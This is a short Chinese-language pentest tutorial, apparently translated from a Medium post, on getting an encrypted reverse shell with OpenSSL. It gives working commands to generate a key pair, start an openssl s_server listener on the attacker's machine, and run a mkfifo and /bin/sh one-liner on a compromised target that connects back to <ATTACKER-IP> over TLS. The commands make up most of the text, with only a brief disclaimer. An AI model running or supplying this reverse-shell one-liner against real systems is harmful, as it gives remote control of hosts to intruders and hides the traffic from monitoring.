利用OpenSSL搭建一个反弹shell

iso60001  2129天前

22.jpg

渗透测试时有很多方法可以获得一个反弹shell,例如netcat、php、perl、.net、lolbins等等。但我最喜欢的方法之一利用是Openssl来获得一个反弹shell。是的,就是那个几乎每个https都要使用的库,我们先用openssl来生成密钥,最后再使用它来获取一个反弹shell。

准备

首先我们需要在自己的机器上生成密钥,这里用kali来演示。

root@kali# openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

启动监听(渗透机器)

openssl s_server -quiet -key key.pem -cert cert.pem -port <PORT>

反弹shell(目标机器)

最后在目标机器,也就是你所攻破的机器,运行如下命令:

33.png

low-user@pwned#: mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <ATTACKER-IP>:<PORT> > /tmp/s; rm /tmp/s
本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场
来源:https://medium.com/@int0x33/day-43-reverse-shell-with-openssl-1ee2574aa998

最新评论

昵称
邮箱
提交评论